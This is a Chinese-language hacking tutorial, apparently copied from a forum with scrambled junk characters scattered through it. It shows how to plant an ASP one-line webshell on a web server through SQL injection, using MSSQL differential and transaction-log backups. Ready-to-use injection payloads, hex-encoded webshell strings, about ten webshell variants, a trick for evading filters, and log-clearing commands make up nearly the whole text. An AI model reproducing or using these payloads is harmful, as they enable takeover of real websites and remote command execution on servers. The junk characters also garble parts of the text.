MSsql差异备份总结

admin

差异备份的流程大概这样：
- [9 t/ |7 Q/ j& D3 K0 \+ U. {7 \1.完整备份一次(保存位置当然可以改)
' G$ f% U; |1 h# Ubackup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据
1 I4 b! e* L9 Screate table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
$ ~3 q: ]/ ?+ y" V; `- i& `
: ~' j! G" K/ Y5 y( O+ h3.进行差异备份
6 u+ a5 P0 H" O# ?) y. F& lbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
7 k& S) A7 _& H! ^4 Y8 e* s
上面
) D2 g0 T! R+ g+ P: S  J0x3C25657865637574652872657175657374282261222929253E
$ A3 Q6 B6 o( v) j' h就是一句话木马的内容：<%execute(request("a"))%>
, J( `. I) z9 q& {' F: n
% _6 ~  s8 y- x, K如下是网上常见的差异备份代码，思路一样！
' V" I2 [/ E" H===================================================
! L, {& ]; {- P& |$ J0 g& v+ W利用差异备份提高提高backupwebshell的成功率,减少文件大小
( F! {' L# f" f& Y步骤:

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
  g/ J5 O7 C2 @) O
8 x1 R9 r" w1 r# [/ Z7 Z2 mcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
; w. b! z2 b* K, {4 j
! C; N7 `# O1 p4 s: n3 {
7 c. V& @. K# @- J' }& Qinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

0 s- U2 R+ m, ]declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

5 e+ B# T: a6 E# p- l$ s: X6 u  Z  Ddrop table [xiaolu]  -- 删除此表。

5 c( l; \/ q5 v  I3 i( y0x77006F006B0061006F002E00620061006B00为wokao.bak
- ^! y+ N" C! }" T7 e3 [" w: N0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
" A" i9 q! K0 z+ U/ K- Z0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp

0 e% y' b( l0 M声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================
+ m4 c6 z! K0 X. y
我发现上面代码，有时会无效，而直接用
; |& Q' i$ c5 E; Z5 p4 L( {
8 M/ {  ]* G% I% I7 Pbackup database 库名 to disk = 'c:\ddd.bak'
" w2 g1 E" k. k: f, H% u
create table [dbo].[dtest] ([cmd] [image]);
4 B! g: l4 w# P, L! `
8 d+ r9 w# q' p' I: yinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
. m7 R- _  S, k+ E( C
8 ?1 N! c' \2 F  p9 @5 o% Qbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
# G# x- C2 G- x9 U1 H' \
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
$ I$ [. V- @7 s; O, l
* P' g; K& i  D9 Y  }5 ~1 l网上还有log增量备份的，我也把他记录一下
=====================================================
) ]" F, l4 S! Z* c) N% ]另一种log增量备份技术:

';alter database null set RECOVERY FULL--

+ H: s& L! J* ?: U4 X';create table cmd (a image)--

  N8 o: k! d- m; {- v6 |';backup log null to disk = 'f:\cmd' with init--
4 K) y3 K& [6 V# x0 {
1 X: D/ Y8 C- h( f# b) s: ^';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
# V7 F# q) D8 _/ k7 M9 Y$ {
- d: F6 ]2 i; i';backup log null to disk = '备份路径'--

$ F$ F( f& Z% u: n, S  |';drop table cmd--

';alter database XXX set RECOVERY SIMPLE--

PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：
5 I8 K- O6 G/ x) y
4 Q7 h4 W9 Y# y8 u; C/ ]- U* Ka)<%%25Execute(request("a"))%%25>
0 g9 E9 b- L* g% [# j& d7 J; ub)<%Execute(request("a"))%>
+ A0 J9 w8 f1 Jc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话
; L1 A4 Z8 f2 o+ G! O" ^) P
! i: K! c" @# ~6 y* @; n9 r: S1 ^9 p=============================================
9 t' t9 d- g% D) D( F1 {4 B
当遇到差备过滤了/时用这个语句代替
4 H- O4 c8 W+ I5 `/ e% Q- S, L! i, }
declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
: m! i$ r0 w- [  q1 ~
把要执行的语句转16进制然后用exec执行
+ b- Z* d7 ?8 g% u0 J( i
% T4 [2 s, i% S1 X6 e6 \8 O7 ]% N
1 k6 v! x: y: ]: h/ f. i7 q减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
0 i; F& z2 {9 h( N! O. M( p1
+ T) c7 ^/ k7 i" w- ?; \. I' Uid=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
* N  C/ i  t+ @: Cid=1;backup database model to disk='你的路径‘ with differential,format;--
" [& f; L( s! A7 E- j2 P: i/ E' E8 m
$ B) ?8 _5 y. F: m
0 {% O9 A* R* l" k) |  @
! J" _1 u' X. g& Q* RSQL语句清理日志
注：test为数据库名
2 @7 r" d+ C7 ]4 n
, q& }& O, I" @2 c6 |--清空日志
DUMP TRANSACTION test WITH NO_LOG
) t0 I6 c$ M: V) Q* k; _3 E& n
--截断事务日志
3 x3 v0 J0 b. t8 g% q, o: EBACKUP LOG test WITH NO_LOG
4 `, O8 Y5 V! T0 \7 o, z
' j+ U" \5 j. u--收缩数据库
4 @+ p% k8 e( I$ R. jDBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
4 S$ d5 v% y- [8 q( R0 k6 ]
2 \3 c  y! G$ u! A--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'